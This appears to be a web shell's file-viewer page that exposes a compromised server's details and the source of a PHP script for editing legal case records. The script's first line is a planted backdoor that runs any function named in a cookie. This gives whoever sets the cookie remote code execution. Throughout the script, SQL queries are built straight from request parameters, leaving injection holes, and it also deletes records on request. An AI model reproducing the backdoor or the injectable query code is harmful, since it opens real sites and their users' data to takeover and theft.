MOON
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 FrontPage/5.0.2.2635
System: Linux server.asjudinet.com 2.6.32-042stab141.3 #1 SMP Fri Nov 15 22:45:34 MSK 2019 i686
User: asjudine (504)
PHP: 5.2.17
Disabled: NONE
Upload Files
File: /home/asjudine/public_html/modifica_actuacion_alertas.php
<?php

if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);


require_once("mainfile.php");
include ("config.php");
global $dbi;
require_once("Conectarse.php");


$cedula=$_GET["cedula"];		
$proceso=$_GET["proceso"];
$id=$_GET["id"];





/**AGREGO ESTO NUEVO PARA MENSAJE*/
/*$control_alertas = mysql_query('SELECT alerta1, alerta2, alerta3, alerta4, alerta5, alerta6 FROM actuaciones WHERE id = "'.$id.'" ');
list($alert1, $alert2, $alert3, $alert4, $alert5, $alert6) = mysql_fetch_row($control_alertas);

if($alert1 != "" || $alert2 != "" || $alert3 != "" || $alert4 != "" || $alert5 != "" || $alert6 != "")
{
	echo "<script>alert('Ya tiene Alertas, si todo el correcto dar click en el boton modificar actuacion para enviar mensaje de texto al afiliado');</script>";
}*/



/*
$editFormAction = $_SERVER['PHP_SELF'];
if (isset($_SERVER['QUERY_STRING']))
{
  $editFormAction .= "?" . htmlentities($_SERVER['QUERY_STRING']);
}

if ((isset($_POST["MM_insert"])) && ($_POST["MM_insert"] == "form"))
{
     $contenido = strtoupper($contenido);
    // $sql2 = "select * from actuaciones where id = $id";
     //$control2 = mysql_query($sql2, $dbi);
 $control2 = mysql_query('SELECT *  FROM actuaciones WHERE id = "' . $HTTP_GET_VARS["id"]  . '"  ');
			if (!$control2) {
				die('Invalid query: ' . mysql_error());
			}
	 $tip2 = mysql_result($control2,0,"tipo_orden");	
	 if($tipo==' ')
	 {
	 	$tipo = $tip2;
	 }

	 $msql = mysql_query("UPDATE  actuaciones  set actuacion = '" . $_POST[contenido] . "',  fecha = '" . $_POST[fecha] . "' , estado = '1' WHERE id = '" . $HTTP_GET_VARS["id"]  . "'  "); 
	
if (!$msql) {
				die('Invalid query update 1: ' . mysql_error());
			} 

	 
     echo "<script>alert('Registro modificado correctamente');<script>";
}
*/
if(isset($_POST["guardar"]))
{
	$contenido = strtoupper($contenido);
    // $sql2 = "select * from actuaciones where id = $id";
     //$control2 = mysql_query($sql2, $dbi);
 	$control2 = mysql_query('SELECT id, cedula, numero_proceso, tipo_orden  FROM actuaciones WHERE id = "'.$_GET["id"].'"  ');
	if (!$control2) {
		die('Invalid query: ' . mysql_error());
	}
	//$tip2 = mysql_result($control2,0,"tipo_orden");	
	list($id_nuevo, $cedula_nuevo, $numpro_nuevo, $tipo_orden) = mysql_fetch_row($control2);
	if($tipo==' ')
	{
		$tipo = $tip2;
	}
	
	
	

	$cedula=$_GET["cedula"];		
	$proceso=$_GET["proceso"];
	$conten=$_POST["contenido"];
	$fech=$_POST["fecha"];
/*
$succ = mysql_query('SELECT nombre FROM cartera_serviasjudinet WHERE cedula = "' .$cedula. '" ');
		  if (!$succ) {
				die('Invalid query succ: ' . mysql_error());
			}
		list($nombr) = mysql_fetch_row($succ); 
		*/
		
		////////////////////////////
		
	$control = mysql_query('SELECT nombre FROM cartera_serviasjudinet  WHERE cedula = "' .$cedula. '" ');
	if (!$control) {
		die('Invalid query: ' . mysql_error());
	}  
    list($nombr) = mysql_fetch_row($control);
	 
	if((mysql_num_rows($control)==0)) 
	{
		$control = mysql_query('SELECT nombre FROM beneficiarios   WHERE cedula = "' .$cedula. '"  ');
		if (!$control) {
			die('Invalid query: ' . mysql_error());
		}  
     	list($nombr) = mysql_fetch_row($control);
	}
		
		/////////

	/*
	if($tipo_orden == "ARANCEL")
	{
		$msql = mysql_query("UPDATE actuaciones set actuacion = '".$_POST["contenido"]."', fecha = '".$_POST["fecha"]."', estado = '1' WHERE id = '".$_GET["id"]."' "); 
	
		if (!$msql) {
			die('Invalid query update 1: ' . mysql_error());
		} 


		$contro45= mysql_query('SELECT * FROM procesos WHERE cedula = "'.$_GET["cedula"].'" and numero_proceso = "'.$_GET["proceso"]. '" and estado = "3"');
		if (!$contro45) {
			die('Invalid query: ' . mysql_error());
		}
		
		if ((mysql_num_rows($contro45)!=0)) 
		{
			$msqle = mysql_query("UPDATE  procesos set estado = '1' WHERE cedula = '".$_GET["cedula"]."' and numero_proceso = '".$_GET["proceso"]."' "); 
			if (!$msqle) {
				die('Invalid query update 3: ' . mysql_error());
			} 
		}

	 
     	echo "<script>alert('Registro modificado correctamente');</script>";
	 	echo "<script languaje='javascript' type='text/javascript'>window.close();</script>";
	}
	*/
	
	//else
	//{
		$mensajes = mysql_query("INSERT INTO mensajes_texto (cedula,nombre,numero_proceso,actuacion,fecha,estado) VALUES ('".$cedula."','".$nombr."', '".$proceso."', '".$conten."','".$fech."', '0')");


		$msql = mysql_query("UPDATE actuaciones set actuacion = '".$_POST["contenido"]."', fecha = '".$_POST["fecha"]."', estado = '1' WHERE id = '".$_GET["id"]."' "); 
	
		if (!$msql) {
			die('Invalid query update 1: ' . mysql_error());
		} 


		$contro45= mysql_query('SELECT * FROM procesos WHERE cedula = "'.$_GET["cedula"].'" and numero_proceso = "'.$_GET["proceso"]. '" and estado = "3"');
		if (!$contro45) {
			die('Invalid query: ' . mysql_error());
		}
		
		if ((mysql_num_rows($contro45)!=0)) 
		{
			$msqle = mysql_query("UPDATE  procesos set estado = '1' WHERE cedula = '".$_GET["cedula"]."' and numero_proceso = '".$_GET["proceso"]."' "); 
			if (!$msqle) {
				die('Invalid query update 3: ' . mysql_error());
			} 
		}

	 
     	echo "<script>alert('Registro modificado correctamente');</script>";
	 	echo "<script languaje='javascript' type='text/javascript'>window.close();</script>";
	//}
}

?>

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8; IE=9; IE=edge" />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<script languaje="JavaScript">
function Mostrar_Fecha()
{
         var mydate=new Date()
         var year=mydate.getYear()
         if(year < 1000)		 
                 year+=1900
                 var day=mydate.getDay()
                 var month=mydate.getMonth()
                 var daym=mydate.getDate()
                 if (daym < 10)
                    daym="0"+daym
                    var dayarray=new Array("Domingo","Lunes","Martes","Miercoles","Jueves","Viernes","Sabado")
                    var montharray=new Array("Enero","Febrero","Marzo","Abril","Mayo","Junio","Julio","Agosto","Septiembre","Octubre","Noviembre","Diciembre")
                    document.write("<b><font face='Arial, Helvetica, sans-serif'>"+dayarray[day]+" "+daym+" de "+montharray[month]+" de "+year+"</font></b>")
}					
</script>

<style type="text/css">
<!--
.Estilo1 {
	color: #990000;
	font-family: "Arial Narrow";
	font-weight: bold;
}
.Estilo4 {color: #0033CC; font-weight: bold; }

.botonnew{
	background-color:#D94649;
	color:#FFF;
}

.parrafo{
	text-align:center;
	margin:0 auto;
	font-size:2em;
	color:#D94649;
}
-->
</style>
</head>

<body>
<FORM action="<?php echo $editFormAction; ?>" method="post" name="form">
<div>
<p class="parrafo">
Primero generar alertas si es necesario, desp&uacute;es CLICK en Modificar Actuaci&oacute;n 
</p>
</div>

<table width="495" border="1" align="center" cellpadding="2" cellspacing="2">
  <tr>
    <td width="418" bgcolor="#00CCFF"><div align="center"><span class="Estilo1"> MODIFICAR ACTUACION</span></div></td>
  </tr>
  <tr>
    <td height="22" bgcolor="#00CCFF"><div align="center">
      <script languaje="JavaScript">Mostrar_Fecha()</script>
    </div></td>
  </tr>
   <tr>
<?php
     //$sql = "select * from actuaciones where id = $id";
    // $control = mysql_query($sql, $dbi);
	 
	  $control = mysql_query('SELECT *  FROM actuaciones WHERE id = "' . $_GET["id"]  . '"  ');
			if (!$control) {
				die('Invalid query: ' . mysql_error());
			}
	 $act = mysql_result($control,0,"actuacion");		
	 $fec = mysql_result($control,0,"fecha");		
	 $tip = mysql_result($control,0,"tipo_orden");		  
     echo "<tr><td><textarea name='contenido' cols='50' rows='4' title='MODIFICA ACTUACION'>\n";
     echo htmlspecialchars($act)."\n";
     echo "</textarea></td></tr>";				   
	 echo "<input name='id' type='hidden' value=$id size='11' maxlength='11'>";
?>
  <tr>
    <td height="22" bgcolor="#00CCFF"><span class="Estilo4">Modificar Fecha de revista:</span> <?php echo "<input name=fecha type='text' value=$fec size='10' maxlength='10'>"; ?> <strong>AAAA-MM-DD </strong></td>
  </tr>
  

  
  
<tr>
   <td bgcolor="#00CCFF"><div align="center">
    
	 <?php
     echo "<input type='button' value='ALERTAS' name='cedu' class='botonnew' onClick=window.open('formulario_generar_alertas.php?cedula=$cedula&numpro=$proceso&id=$id','','top=30,left=50,toolbar=yes,scrollbars=yes,width=690,height=400,status=yes')>";
	 ?>
	 <input name="guardar" type="submit"  class="Estilo4"  value ="Modificar Actuacion" > 
	 
     
     
     <input name="eliminar_revista" type="submit" class="botonnew"  value="ELIMINAR REVISTA">
     <input name="button" type="button" class="Estilo4"  value="Cerrar Ventana">
   </div></td>
   </tr>
   
</TABLE>
    <input type="hidden" name="MM_insert" value="form">
</FORM>
</body>
</html>



<?php 
if(isset($_POST["eliminar_revista"]))
{
	$elimina_revista = mysql_query("DELETE FROM `actuaciones` WHERE id = '".$id."' ");
	if (!$elimina_revista) {
		die('Error al eliminar: ' . mysql_error());
	}
	echo "<script>alert('La Revista fue eliminar')</script>";
}
?>